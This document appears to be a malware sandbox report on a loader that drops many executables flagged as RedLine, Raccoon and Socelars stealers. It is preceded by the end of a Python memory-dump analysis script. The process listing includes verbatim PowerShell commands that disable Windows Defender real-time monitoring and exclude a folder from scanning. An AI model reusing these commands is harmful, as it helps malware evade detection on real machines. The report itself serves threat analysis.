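    hits = {}
    for (start, end), pids in by_region.items():
        inside = {p for p in pids if any(start <= a < end for a in mappings.get(p, []))}
        if len(inside) >= 2:
            hits[(start, end)] = sorted(inside)
    return hits

if __name__ == "__main__":
    files, regions, mappings = parse_listing(SAMPLE)
    print(classify(files), shared_regions(regions, mappings))
```

The `0x0000000000000000-mapping.dmp` entries (PID 820 in the sample) carry no address and are deliberately ignored by `shared_regions`; only a mapping that lands inside a dumped image range counts, which is what separates the two-process case from an ordinary DLL region dumped from one PID.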

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-06 18:11

Reported

2022-08-06 18:13

Platform

win10v2004-20220721-en

Max time kernel

142s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

Signatures

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
6 hits; no description, indicator, process or target recorded

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
2 hits; no description, indicator, process or target recorded

OnlyLogger payload

Description Indicator Process Target
2 hits; no description, indicator, process or target recorded

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
6 hits; no description, indicator, process or target recorded

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1984208f692605cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19ad8dd95e905.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19581adec51f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue199b79a9228e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-LAOEC.tmp C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
(Privilege LUIDs 31 to 35 are left unresolved by the sandbox; in winnt.h they are SeTrustedCredManAccessPrivilege (31), SeRelabelPrivilege (32), SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34) and SeCreateSymbolicLinkPrivilege (35). Read together with the rows above, Tue19b2a645b19f70.exe adjusts every well-known privilege in LUID order from 2 (SeCreateTokenPrivilege) to 35, which is the signature of an "enable all privileges" loop rather than a targeted request for the one privilege the code needs.)
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
(the SeShutdownPrivilege / SeCreatePagefilePrivilege pair above is logged 12 times in total with no process attributed; the repeats are omitted here)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1140 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c43a743a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1922ecc1aaabd2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196c8dc8316d5e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1967b2731eea4d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b1a112f2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19862f0a4c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe

Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ad8dd95e905.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe

Tue1922ecc1aaabd2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19581adec51f.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe

Tue196c8dc8316d5e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe

Tue1967b2731eea4d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe

Tue19c43a743a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp" /SL5="$601BC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19581adec51f.exe

Tue19581adec51f.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b2a645b19f70.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue199b79a9228e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19ad8dd95e905.exe

Tue19ad8dd95e905.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1984208f692605cf.exe

Tue1984208f692605cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe

Tue19862f0a4c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19de85da9de6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1140 -ip 1140

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue199b79a9228e.exe

Tue199b79a9228e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1984208f692605cf.exe

